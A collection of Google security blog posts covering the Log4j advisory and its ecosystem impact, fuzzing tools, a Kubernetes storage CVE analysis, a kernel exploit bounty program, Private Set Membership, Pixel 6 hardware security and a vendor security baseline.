Tag Archives: Security

Apache Log4j Vulnerability

Like many other companies, we’re closely following the multiple CVEs regarding Apache Log4j 2. Our security teams are investigating any potential impact on Google products and services and are focused on protecting our users and customers.

We encourage anyone who manages environments containing Log4j 2 to update to the latest version.

Based on findings in our ongoing investigations, here is our list of product and service updates as of December 17th (CVE-2021-44228 & CVE-2021-45046):

Android is not aware of any impact to the Android Platform or Enterprise. At this time, no update is required for this specific vulnerability, but we encourage our customers to ensure that the latest security updates are applied to their devices.

Chrome OS  releases and infrastructure are not using versions of Log4j affected by the vulnerability.

Chrome Browser releases, infrastructure and admin console are not using versions of Log4j affected by the vulnerability.

Google Cloud has a specific advisory dedicated to updating customers on the status of GCP and Workspace products and services.

Google Marketing Platform, including Google Ads is not using versions of Log4j affected by the vulnerability. This includes Display & Video 360, Search Ads 360, Google Ads, Analytics (360 and free), Optimize 360, Surveys 360 & Tag Manager 360.

YouTube  is not using versions of Log4j affected by the vulnerability.

We will continue to update this advisory with the latest information.

Understanding the Impact of Apache Log4j Vulnerability



More than 35,000 Java packages, amounting to over 8% of the Maven Central repository (the most significant Java package repository), have been impacted by the recently disclosed log4j vulnerabilities (1, 2), with widespread fallout across the software industry. The vulnerabilities allow an attacker to perform remote code execution by exploiting the insecure JNDI lookups feature exposed by the logging library log4j. This exploitable feature was enabled by default in many versions of the library.


This vulnerability has captivated the information security ecosystem since its disclosure on December 9th because of both its severity and widespread impact. As a popular logging tool, log4j is used by tens of thousands of software packages (known as artifacts in the Java ecosystem) and projects across the software industry. User’s lack of visibility into their dependencies and transitive dependencies has made patching difficult; it has also made it difficult to determine the full blast radius of this vulnerability. Using Open Source Insights, a project to help understand open source dependencies, we surveyed all versions of all artifacts in the Maven Central Repository to determine the scope of the issue in the open source ecosystem of JVM based languages, and to track the ongoing efforts to mitigate the affected packages.


How widespread is the log4j vulnerability?

As of December 16, 2021, we found that 35,863 of the available Java artifacts from Maven Central depend on the affected log4j code. This means that more than 8% of all packages on Maven Central have at least one version that is impacted by this vulnerability. (These numbers do not encompass all Java packages, such as directly distributed binaries, but Maven Central is a strong proxy for the state of the ecosystem.)

As far as ecosystem impact goes, 8% is enormous. The average ecosystem impact of advisories affecting Maven Central is 2%, with the median less than 0.1%.
Direct dependencies account for around 7,000 of the affected artifacts, meaning that any of its versions depend upon an affected version of log4j-core or log4j-api, as described in the CVEs. The majority of affected artifacts come from indirect dependencies (that is, the dependencies of one’s own dependencies), meaning log4j is not explicitly defined as a dependency of the artifact, but gets pulled in as a transitive dependency.


What is the current progress in fixing the open source JVM ecosystem?
We counted an artifact as fixed if the artifact had at least one version affected and has released a greater stable version (according to semantic versioning) that is unaffected. An artifact affected by log4j is considered fixed if it has updated to 2.16.0 or removed its dependency on log4j altogether.

At the time of writing, nearly five thousand of the affected artifacts have been fixed. This represents a rapid response and mammoth effort both by the log4j maintainers and the wider community of open source consumers.

That leaves over 30,000 artifacts affected, many of which are dependent on another artifact to patch (the transitive dependency) and are likely blocked.


Why is fixing the JVM ecosystem hard?
Most artifacts that depend on log4j do so indirectly. The deeper the vulnerability is in a dependency chain, the more steps are required for it to be fixed. The following diagram shows a histogram of how deeply an affected log4j package (core or api) first appears in consumers dependency graphs. For greater than 80% of the packages, the vulnerability is more than one level deep, with a majority affected five levels down (and some as many as nine levels down). These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first.



Another difficulty is caused by ecosystem-level choices in the dependency resolution algorithm and requirement specification conventions.

In the Java ecosystem, it’s common practice to specify “soft” version requirements — exact versions that are used by the resolution algorithm if no other version of the same package appears earlier in the dependency graph. Propagating a fix often requires explicit action by the maintainers to update the dependency requirements to a patched version.

This practice is in contrast to other ecosystems, such as npm, where it’s common for developers to specify open ranges for dependency requirements. Open ranges allow the resolution algorithm to select the most recently released version that satisfies dependency requirements, thereby pulling in new fixes. Consumers can get a patched version on the next build after the patch is available, which propagates up the dependencies quickly. (This approach is not without its drawbacks; pulling in new fixes can also pull in new problems.)

How long will it take for this vulnerability to be fixed across the entire ecosystem?

It’s hard to say. We looked at all publicly disclosed critical advisories affecting Maven packages to get a sense of how quickly other vulnerabilities have been fully addressed. Less than half (48%) of the artifacts affected by a vulnerability have been fixed, so we might be in for a long wait, likely years.

But things are looking promising on the log4j front. After less than a week, 4,620 affected artifacts (~13%) have been fixed. This, more than any other stat, speaks to the massive effort by open source maintainers, information security teams and consumers across the globe.

Where to focus next?

Thanks and congratulations are due to the open source maintainers and consumers who have already upgraded their versions of log4j. As part of our investigation, we pulled together a list of 500 affected packages with some of the highest transitive usage. If you are a maintainer or user helping with the patching effort, prioritizing these packages could maximize your impact and unblock more of the community.

We encourage the open source community to continue to strengthen security in these packages by enabling automated dependency updates and adding security mitigations. Improvements such as these could qualify for financial rewards from the Secure Open Source Rewards program.

You can explore your package dependencies and their vulnerabilities by using Open Source Insights.

Improving OSS-Fuzz and Jazzer to catch Log4Shell

The discovery of the Log4Shell vulnerability has set the internet on fire. Similar to shellshock and heartbleed, Log4Shell is just the latest catastrophic vulnerability in software that runs the internet. Our mission as the Google Open Source Security Team is to secure the open source libraries the world depends on, such as Log4j. One of our capabilities in this space is OSS-Fuzz, a free fuzzing service that is used by over 500 critical open source projects and has found more than 7,000 vulnerabilities in its lifetime.

We want to empower open source developers to secure their code on their own. Over the next year we will work on better automated detection of non-memory corruption vulnerabilities such as Log4Shell. We have started this work by partnering with the security company Code Intelligence to provide continuous fuzzing for Log4j, as part of OSS-Fuzz. Also as part of this partnership, Code-Intelligence improved their Jazzer fuzzing engine to make it capable of detecting remote JNDI lookups. We have awarded Code Intelligence $25,000 for this effort and will continue to work with them on securing the open source ecosystem.
Vulnerabilities like Log4Shell are an eye-opener for the industry in terms of new attack vectors. With OSS-Fuzz and Jazzer, we can now detect this class of vulnerability so that they can be fixed before they become a problem in production code.

Over the past year we have made a number of investments to strengthen the security of critical open source projects, and recently announced our $10 billion commitment to cybersecurity defense including $100 million to support third-party foundations that manage open source security priorities and help fix vulnerabilities.

We appreciate the maintainers, security engineers and incident responders that are working to mitigate Log4j and make our internet ecosystem safer.

Check out our documentation to get started using OSS-Fuzz.

Empowering the next generation of Android Application Security Researchers

The external security researcher community plays an integral role in making the Google Play ecosystem safe and secure. Through this partnership with the community, Google has been able to collaborate with third-party developers to fix thousands of security issues in Android applications before they are exploited and reward security researchers for their hard work and dedication.

In order to empower the next generation of Android security researchers, Google has collaborated with industry partners including HackerOne and PayPal to host a number of Android App Hacking Workshops. These workshops are an effort designed to educate security researchers and cybersecurity students of all skill levels on how to find Android application vulnerabilities through a series of hands-on working sessions, both in-person and virtual.

Through these workshops, we’ve seen attendees from groups such as Merritt College's cybersecurity program and alumni of Hack the Hood go on to report real-world security vulnerabilities to the Google Play Security Rewards program. This reward program is designed to identify and mitigate vulnerabilities in apps on Google Play, and keep Android users, developers and the Google Play ecosystem safe.

Today, we are releasing our slide deck and workshop materials, including source code for a custom-built Android application that allows you to test your Android application security skills in a variety of capture the flag style challenges.

These materials cover a wide range of techniques for finding vulnerabilities in Android applications. Whether you’re just getting started or have already found many bugs - chances are you’ll learn something new from these challenges! If you get stuck and need a hint on solving a challenge, the solutions for each are available in the Android App Hacking Workshop here.

As you work through the challenges and learn more about the techniques and tips described in our workshop materials, we’d love to hear your feedback.

Additional Resources:

  • If you want to learn more about how to prepare, launch, and run a Vulnerability Disclosure Program (VDP) or discover how to work with external security researchers, check out our VDP course here.
  • If you’re a developer looking to build more secure applications, check out Android app security best practices here.

Exploring Container Security: A Storage Vulnerability Deep Dive



Kubernetes Security is constantly evolving - keeping pace with enhanced functionality, usability and flexibility while also balancing the security needs of a wide and diverse set of use-cases.

Recently, the GKE Security team discovered a high severity vulnerability that allowed workloads to have access to parts of the host filesystem outside the mounted volumes boundaries. Although the vulnerability was patched back in September we thought it would be beneficial to write up a more in-depth analysis of the issue to share with the community.

We assessed the impact of the vulnerability as described in vulnerability management in open-source Kubernetes and worked closely with the GKE Storage team and the Kubernetes Security Response Committee to find a fix. In this post we’ll give some background on how the subpath storage system works, an overview of the vulnerability, the steps to find the root cause and the fix, and finally some recommendations for GKE and Anthos users.


Kubernetes Filesystems: Intro to Volume Subpath
The vulnerability, CVE-2021-25741, was caused by a race condition during the creation of a subpath bind mount inside a container, and allowed an attacker to gain unauthorized access to the underlying node filesystem and its sensitive files. We’ll describe how that system is supposed to work, and then talk about the vulnerability.

The volume subpath feature in Kubernetes enables sharing a volume in multiple containers inside a pod. For example, we could create a Pod with an InitContainer that creates directories with pre-populated data in a mounted filesystem volume. These directories can then be used by containers in the same Pod by mounting the same volume and optionally specifying a subpath field to limit what's visible inside the container.

While there are some great use cases for this feature, it’s an area that has had vulnerabilities discovered in the past. The kubelet must be extra cautious when handling user-owned subpaths because it operates with privileges in the host. One vulnerability that has been previously discovered involved the creation of a malicious workload where an InitContainer would create a symlink pointing to any location in the host. For example, the InitContainer could mount a volume in /mnt and create a symlink /mnt/attack inside the container pointing to /etc. Later in the Pod lifecycle, another container would attempt to mount the same volume with subpath attack. While preparing the volumes for the container, the kubelet would end up following the symlink to the host’s /etc instead of the container’s /etc, unknowingly exposing the host filesystem to the container. A previous fix made sure that the subpath mount location is resolved and validated to point to a location inside the base volume and that it's not changeable by the user in between the time the path was validated and when the container runtime bind mounts it. This race condition is known as time of check to time of use (TOCTOU) where the subject being validated changes after it has been validated.

These validations and others are summarized in the following container lifecycle sequence diagram.




Volume subpath validations before the container startup

A New TOCTOU Vulnerability: CVE-2021-25741
The latest vulnerability was discovered by performing a symlink attack similar to the one explained above, with the difference being that it constantly swapped the symlink with a directory in a tight loop, using the RENAME_EXCHANGE option with renameat(2). If the timing is just right, the kubelet will see the path as a directory and pass the validation check. Then the mount utility may find that the path is a symlink pointing to the host and follow it, exposing the host filesystem to the container. This is visualized in the following diagram:


The expectation and the attack outcome

The GKE Security and Storage teams worked closely to revise the fix done previously to find a solution. The previous fix takes several steps to ensure that the directory being mounted is safely opened and validated. After the file is opened and validated, the kubelet uses the magic-link path under /proc/[pid]/fd directory for all subsequent operations to ensure the file remains unchanged. However, we found out that all of the efforts were undone by the mount(8) linux utility which was dereferencing the procfs magic-link by default. Once the problem was understood, the fix involved making sure that the mount utility doesn't dereference the magic-links by using the --no-canonicalize flag in the mount command.

The fix is in

Once the problem was well understood, we fixed it inside Kubernetes and quickly released the fix to GKE and Anthos. If GKE auto-upgrade is enabled in your clusters there's no action on your part for this vulnerability, your nodes have already been patched. We strongly recommend that customers utilize auto-upgrades. Auto-upgrade gives peace of mind that your clusters are running with the latest patches.

GKE released a Google Kubernetes Engine security bulletin on this vulnerability, which detailed what customers can do to immediately remediate this issue across GKE and Anthos. We also provided guidance to customers who manually manage their node versions, ensuring that fixed releases were available in every region for our Static and Release Channels.

Moving forward
Google continues to invest heavily in the security of GKE and Kubernetes. We encourage users interested in finding vulnerabilities to participate in the Kubernetes bug bounty program and in the Google Vulnerability Rewards Program (VRP) which was recently expanded to cover GKE vulnerabilities. For the latest guidance on security issues, please follow our GKE Security Bulletins.

ClusterFuzzLite: Continuous fuzzing for all



In recent years, continuous fuzzing has become an essential part of the software development lifecycle. By feeding unexpected or random data into a program, fuzzing catches bugs that would otherwise slip through the most thorough manual checks and provides coverage that would take staggering human effort to replicate. NIST’s guidelines for software verification, recently released in response to the White House Executive Order on Improving the Nation’s Cybersecurity, specify fuzzing among the minimum standard requirements for code verification.

Today, we are excited to announce ClusterFuzzLite, a continuous fuzzing solution that runs as part of CI/CD workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed, enhancing the overall security of the software supply chain.

Since its release in 2016, over 500 critical open source projects have integrated into Google’s OSS-Fuzz program, resulting in over 6,500 vulnerabilities and 21,000 functional bugs being fixed. ClusterFuzzLite goes hand-in-hand with OSS-Fuzz, by catching regression bugs much earlier in the development process.

Large projects including systemd and curl are already using ClusterFuzzLite during code review, with positive results. According to Daniel Stenberg, author of curl, “When the human reviewers nod and have approved the code and your static code analyzers and linters can't detect any more issues, fuzzing is what takes you to the next level of code maturity and robustness. OSS-Fuzz and ClusterFuzzLite help us maintain curl as a quality project, around the clock, every day and every commit.”

With the release of ClusterFuzzLite, any project can integrate this essential testing standard and benefit from fuzzing. ClusterFuzzLite offers many of the same features as ClusterFuzz, such as continuous fuzzing, sanitizer support, corpus management, and coverage report generation. Most importantly, it’s easy to set up and works with closed source projects, making ClusterFuzzLite a convenient option for any developer who wants to fuzz their software.



 


With ClusterFuzzLite, fuzzing is no longer just an idealized "bonus" round of testing for those who have access to it, but a critical must-have step that everyone can use continuously on every software project. By finding and preventing bugs before they enter the codebase we can build a more secure software ecosystem.

To learn more, check out the ClusterFuzzLite documentation. ClusterFuzzLite currently supports GitHub ActionsGoogle Cloud Build and Prow. We built this with CI system extensibility in mind, and adding support for other CI systems is straightforward. Please contact us if you’re interested in contributing support, or have any questions, feedback or feature requests.

Trick & Treat! ? Paying Leets and Sweets for Linux Kernel privescs and k8s escapes


Starting today and for the next 3 months (until January 31 2022), we will pay 31,337 USD to security researchers that exploit privilege escalation in our lab environment with a patched vulnerability, and 50,337 USD to those that use a previously unpatched vulnerability, or a new exploit technique.

We are constantly investing in the security of the Linux Kernel because much of the internet, and Google—from the devices in our pockets, to the services running on Kubernetes in the cloud—depend on the security of it. We research its vulnerabilities and attacks, as well as study and develop its defenses.

But we know that there is more work to do. That’s why we have decided to build on top of our kCTF VRP from last year and triple our previous reward amounts (for at least the next 3 months).

Our base rewards for each publicly patched vulnerability is 31,337 USD (at most one exploit per vulnerability), but the reward can go up to 50,337 USD in two cases:
  • If the vulnerability was otherwise unpatched in the Kernel (0day)
  • If the exploit uses a new attack or technique, as determined by Google
We hope the new rewards will encourage the security community to explore new Kernel exploitation techniques to achieve privilege escalation and drive quicker fixes for these vulnerabilities. It is important to note, that the easiest exploitation primitives are not available in our lab environment due to the hardening done on Container-Optimized OS. Note this program complements Android's VRP rewards, so exploits that work on Android could also be eligible for up to 250,000 USD (that's in addition to this program).

The mechanics are:
  1. Connect to the kCTF VRP cluster, obtain root and read the flag (read this writeup for how it was done before, and this threat model for inspiration), and then submit your flag and a checksum of your exploit in this form.
  2. (If applicable) report vulnerabilities to upstream.
    • We strongly recommend including a patch since that could qualify for an additional reward from our Patch Reward Program, but please report vulnerabilities upstream promptly once you confirm they are exploitable.
  3. Report your finding to Google VRP once all patches are publicly available (we don't want to receive details of unpatched vulnerabilities ahead of the public.)
    • Provide the exploit code and the algorithm used to calculate the hash checksum.
    • A rough description of the exploit strategy is welcome.
Reports will be triaged on a weekly basis. If anyone has problems with the lab environment (if it's unavailable, technical issues or other questions), contact us on Discord in #kctf. You can read more details about the program here. Happy hunting!

Protecting your device information with Private Set Membership


At Google, keeping you safe online is our top priority, so we continuously build the most advanced privacy-preserving technologies into our products. Over the past few years, we've utilized innovations in cryptographic research to keep your personal information private by design and secure by default. As part of this, we launched Password Checkup, which protects account credentials by notifying you if an entered username and password are known to have been compromised in a prior data breach. Using cryptographic techniques, Password Checkup can do this without revealing your credentials to anyone, including Google. Today, Password Checkup protects users across many platforms including Android, Chrome and Google Password Manager.

Another example is Private Join and Compute, an open source protocol which enables organizations to work together and draw insights from confidential data sets. Two parties are able to encrypt their data sets, join them, and compute statistics over the joint data. By leveraging secure multi-party computation, Private Join and Compute is designed to ensure that the plaintext data sets are concealed from all parties.

In this post, we introduce the next iteration of our research, Private Set Membership, as well as its open-source availability. At a high level, Private Set Membership considers the scenario in which Google holds a database of items, and user devices need to contact Google to check whether a specific item is found in the database. As an example, users may want to check membership of a computer program on a block list consisting of known malicious software before executing the program. Often, the set’s contents and the queried items are sensitive, so we designed Private Set Membership to perform this task while preserving the privacy of our users.

Protecting your device information during enrollment
Beginning in Chrome 94, Private Set Membership will enable Chrome OS devices to complete the enrollment process in a privacy-preserving manner. Device enrollment is an integral part of the out-of-box experience that welcomes you when getting started with a Chrome OS device.

The device enrollment process requires checking membership of device information in encrypted Google databases, including checking if a device is enterprise enrolled or determining if a device was pre-packaged with a license. The correct end state of your Chrome OS device is determined using the results of these membership checks.

During the enrollment process, we protect your Chrome OS devices by ensuring no information ever leaves the device that may be decrypted by anyone else when using Private Set Membership. Google will never learn any device information and devices will not learn any unnecessary information about other devices. ​​To our knowledge, this is the first instance of advanced cryptographic tools being leveraged to protect device information during the enrollment process.

A deeper look at Private Set Membership
Private Set Membership is built upon two cryptographic tools:
  • Homomorphic encryption is a powerful cryptographic tool that enables computation over encrypted data without the need for decryption. As an example, given the encryptions of values X and Y, homomorphic encryption enables computing the encryption of the sum of X and Y without ever needing to decrypt. This preserves privacy as the data remains concealed during the computation. Private Set Membership is built upon Google’s open source homomorphic encryption library.
  • Oblivious hashing is a cryptographic technique that enables two parties to jointly compute a hash, H(K, x), where the sender holds the key, K, and the receiver holds the hash input, x. The receiver will obtain the hash, H(K, x), without learning the key K. At the same time, the input x will be hidden from the sender.
Take a look at how Private Set Membership utilizes homomorphic encryption and oblivious hashing to protect data below:



For a deeper look into the technology behind Private Set Membership, you can also access our open source code.

Privacy properties
By using Private Set Membership, the following privacy properties are obtained:
  • No data leaves the device when checking membership. We designed Private Set Membership using advanced cryptographic techniques to ensure that data never leaves the device in an unencrypted manner when performing membership checks. As a result, the data on your device will be concealed from everyone, including Google.
  • Devices learn only membership information and nothing else. Private Set Membership was designed to prevent devices from learning any unnecessary information about other devices when querying. For each query, devices learn only the results of the membership check and no other information.
Using Private Set Membership to solve more problems
Private Set Membership is a powerful tool that solves a fundamental problem in a privacy-preserving manner. This is just the beginning of what’s possible using this technology. Private Set Membership can help preserve user privacy across a wide array of applications. For example:
  • Checking allow or block lists. In this setting, users check membership in an allow or block list to determine whether to proceed with the desired action. Private Set Membership enables this check without any information about the software leaving the device.
  • Control flows with conditional membership checks. Control flows are a common computer science concept that represent arbitrary computer programs with conditional branching. In many cases, the conditional branches require checking membership of sensitive data to determine the next step of the algorithm. By utilizing Private Set Membership, we enable execution of these algorithms while ensuring data never leaves the user’s device.
We still have a ways to go before Private Set Membership is used for general membership checks by devices. At Google, we are exploring a number of potential use cases to protect your privacy using Private Set Membership. We are excited to continue advancing the state-of-the-art cryptographic research to keep you safe.

Acknowledgements


The work in this post is the result of a collaboration between a large group of current and former Google engineers, research scientists and others including: Amr Aboelkher, Asra Ali, Ghous Amjad, Yves Arrouye, Roland Bock, Xi Chen, Maksim Ivanov, Dennis Kalinichenko, Nirdhar Khazanie, Dawon Lee, Tancrède Lepoint, Lawrence Lui, Pavol Marko, Thiemo Nagel, Mariana Raykova, Aaron Segal, Joon Young Seo, Karn Seth, and Jason Wong.

Pixel 6: Setting a new standard for mobile security

With Pixel 6 and Pixel 6 Pro, we’re launching our most secure Pixel phone yet, with 5 years of security updates and the most layers of hardware security. These new Pixel smartphones take a layered security approach, with innovations spanning across the Google Tensor system on a chip (SoC) hardware to new Pixel-first features in the Android operating system, making it the first Pixel phone with Google security from the silicon all the way to the data center. Multiple dedicated security teams have also worked to ensure that Pixel’s security is provable through transparency and external validation.

Secure to the Core

Google has put user data protection and transparency at the forefront of hardware security with Google Tensor. Google Tensor’s main processors are Arm-based and utilize TrustZone™ technology. TrustZone is a key part of our security architecture for general secure processing, but the security improvements included in Google Tensor go beyond TrustZone.

Figure 1. Pixel Secure Environments

The Google Tensor security core is a custom designed security subsystem dedicated to the preservation of user privacy. It's distinct from the application processor, not only logically, but physically, and consists of a dedicated CPU, ROM, one-time-programmable (OTP) memory, crypto engine, internal SRAM, and protected DRAM. For Pixel 6 and 6 Pro, the security core’s primary use cases include protecting user data keys at runtime, hardening secure boot, and interfacing with Titan M2TM.

Your secure hardware is only as good as your secure OS, and we are using Trusty, our open source trusted execution environment. Trusty OS is the secure OS used both in TrustZone and the Google Tensor security core.

With Pixel 6 and Pixel 6 Pro your security is enhanced by the new Titan M2TM, our discrete security chip, fully designed and developed by Google. In this next generation chip, we moved to an in-house designed RISC-V processor, with extra speed and memory, and made it even more resilient to advanced attacks. Titan M2TM has been tested against the most rigorous standard for vulnerability assessment, AVA_VAN.5, by an independent, accredited evaluation lab. Titan M2™ supports Android Strongbox, which securely generates and stores keys used to protect your PINs and password, and works hand-in-hand with Google Tensor security core to protect user data keys while in use in the SoC.

Moving a step higher in the system, Pixel 6 and Pixel 6 Pro ship with Android 12 and a slew of Pixel-first and Pixel-exclusive features.

Enhanced Controls

We aim to give users better ways to control their data and manage their devices with every release of Android. Starting with Android 12 on Pixel, you can use the new Security hub to manage all your security settings in one place. It helps protect your phone, apps, Google Account, and passwords by giving you a central view of your device’s current configuration. Security hub also provides recommendations to improve your security, helping you decide what settings best meet your needs.

For privacy, we are launching Privacy Dashboard, which will give you a simple and clear timeline view of the apps that have accessed your location, microphone and camera in the last 24 hours. If you notice apps that are accessing more data than you expected, the dashboard provides a path to controls to change those permissions on the fly.

To provide additional transparency, new indicators in Pixel’s status bar will show you when your camera and mic are being accessed by apps. If you want to disable that access, new privacy toggles give you the ability to turn off camera or microphone access across apps on your phone with a single tap, at any time.

The Pixel 6 and Pixel 6 Pro also include a toggle that lets you remove your device’s ability to connect to less-secure 2G networks. While necessary in certain situations, accessing 2G networks can open up additional attack vectors; this toggle helps users mitigate those risks when 2G connectivity isn’t needed.

Built-in security

By making all of our products secure by default, Google keeps more people safe online than anyone else in the world. With the Pixel 6 and Pixel 6 Pro, we’re also ratcheting up the dial on default, built-in protections.

Our new optical under-display fingerprint sensor ensures that your biometric information is secure and never leaves your device. As part of our ongoing security development lifecycle, Pixel 6 and 6 Pro’s fingerprint unlock has been externally validated by security experts as a strong and secure biometric unlock mechanism meeting the Class 3 strength requirements defined in the Android 12 Compatibility Definition Document (CDD).

Phishing continues to be a huge attack vector, affecting everyone across different devices.

The Pixel 6 and Pixel 6 Pro introduce new anti-phishing protections. Built-in protections automatically scan for potential threats from phone calls, text messages, emails, and links sent through apps, notifying you if there’s a potential problem.

Users are also now better protected against bad apps by enhancements to our on-device detection capabilities within Google Play Protect. Since its launch in 2017, Google Play Protect has provided the ability to detect malicious applications even when the device is offline. The Pixel 6 and Pixel 6 Pro uses new machine learning models that improve the detection of malware in Google Play Protect. The detection runs on your Pixel, and uses a privacy preserving technology called federated analytics to discover commonly-run bad apps. This will help to further protect over 3 billion users by improving Google Play Protect, which already analyzes over 100 billion apps every day to detect threats.

Many of Pixel’s privacy-preserving features run inside Private Compute Core, an open source sandbox isolated from the rest of the operating system and apps. Our open source Private Compute Services manages network communication for these features, and uses federated learning, federated analytics, and private information retrieval to improve features while preserving privacy. Some features already running on Private Compute Core include Live Caption, Now Playing, and Smart Reply suggestions.

Google Binary Transparency (GBT) is the newest addition to our open and verifiable security infrastructure, providing a new layer of software integrity for your device. Building on the principles pioneered by Certificate Transparency, GBT helps ensure your Pixel is only running verified OS software. It works by using append-only logs to store signed hashes of the system images. The logs are public and can be used to verify that what’s published is the same as what’s on the device – giving users and researchers the ability to independently verify OS integrity for the first time.

Beyond the Phone

Defense-in-depth isn’t just a matter of hardware and software layers. Security is a rigorous process. Pixel 6 and Pixel 6 Pro benefit from in-depth design and architecture reviews, memory-safe rewrites to security critical code, static analysis, formal verification of source code, fuzzing of critical components, and red-teaming, including with external security labs to pen-test our devices. Pixel is also part of the Android Vulnerability Rewards Program, which paid out $1.75 million last year, creating a valuable feedback loop between us and the security research community and, most importantly, helping us keep our users safe.

Capping off this combined hardware and software security system, is the Titan Backup Architecture, which gives your Pixel a secure foot in the cloud. Launched in 2018, the combination of Android’s Backup Service and Google Cloud’s Titan Technology means that backed-up application data can only be decrypted by a randomly generated key that isn't known to anyone besides the client, including Google. This end-to-end service was independently audited by a third party security lab to ensure no one can access a user's backed-up application data without specifically knowing their passcode.

To top it all off, this end-to-end security from the hardware across the software to the data center comes with no fewer than 5 years of guaranteed Android security updates on Pixel 6 and Pixel 6 Pro devices from the date they launch in the US. This is an important commitment for the industry, and we hope that other smartphone manufacturers broaden this trend.

Together, our secure chipset, software and processes make Pixel 6 and Pixel 6 Pro the most secure Pixel phone yet.

Launching a collaborative minimum security baseline


According to an Opus and Ponemon Institute study, 59% of companies have experienced a data breach caused by one of their vendors or third parties. Outsourcing operations to third-party vendors has become a popular business strategy as it allows organizations to save money and increase operational efficiency. While these are positives for business operations, they do create significant security risks. These vendors have access to critical systems and customer data and so their security posture becomes equally as important.

Up until today, organizations of all sizes have had to design and implement their own security baselines for vendors that align with their risk posture. Unfortunately, this creates an impossible situation for vendors and organizations alike as they try to accommodate thousands of different requirements.

To solve this challenge, organizations across the industry teamed up to design Minimum Viable Secure Product or MVSP – a vendor-neutral security baseline that is designed to eliminate overhead, complexity and confusion during the procurement, RFP and vendor security assessment process by establishing minimum acceptable security baselines. With MVSP, the industry can increase clarity during each phase so parties on both sides of the equation can achieve their goals, and reduce the onboarding and sales cycle by weeks or even months.

MVSP was developed and is backed by companies across the industry, including Google, Salesforce, Okta, Slack and more. Our goal is to increase the minimum bar for security across the industry while simplifying the vetting process.

MVSP is a collaborative baseline focused on developing a set of minimum security requirements for business-to-business software and business process outsourcing suppliers. Designed with simplicity in mind, it contains only those controls that must, at a minimum, be implemented to ensure a reasonable security posture. MVSP is presented in the form of a minimum baseline checklist that can be used to verify the security posture of a solution.

How can MVSP help you?





Security teams measuring vendor offerings against a set of minimum security baselines

MVSP ensures that vendor selection and RFP include a minimum baseline that is backed by the industry. Communicating minimum requirements up front ensures everyone understands where they stand and that the expectations are clear.

Internal teams looking to measure your security against minimum requirements

MVSP provides a set of minimum security baselines that can be used as a checklist to understand gaps in the security of a product or service. This can be used to highlight opportunities for improvement and raise their visibility within the organization, with clearly defined benefits.


Procurement teams gathering information about vendor services

MVSP provides a single set of security-relevant questions that are publicly available and industry-backed. Aligning on a single set of baselines allows clearer understanding from vendors, resulting in a quicker and more accurate response.

Legal teams negotiating contractual controls

MVSP ensures expectations regarding minimum security controls are understood up front, reducing discussions of controls at the contract negotiation stage. Referencing an external baseline helps to simplify contract language and increases familiarity with the requirements.

Compliance teams documenting processes

MVSP provides an externally recognized and adopted set of security baselines on top of which to build your compliance efforts.

We welcome community feedback and interest from other organizations who want to contribute to the MVSP baseline. Together we can raise the minimum bar for security across the industry and make everyone safer.

Acknowledgements

The work in this post is the result of a collaboration between a large number of security practitioners across the industry including: Marat Vyshegorodtsev, Chris John Riley, Gabor Acs-Kurucz, Sebastian Oglaza, Gen Buckley, and Kevin Clark.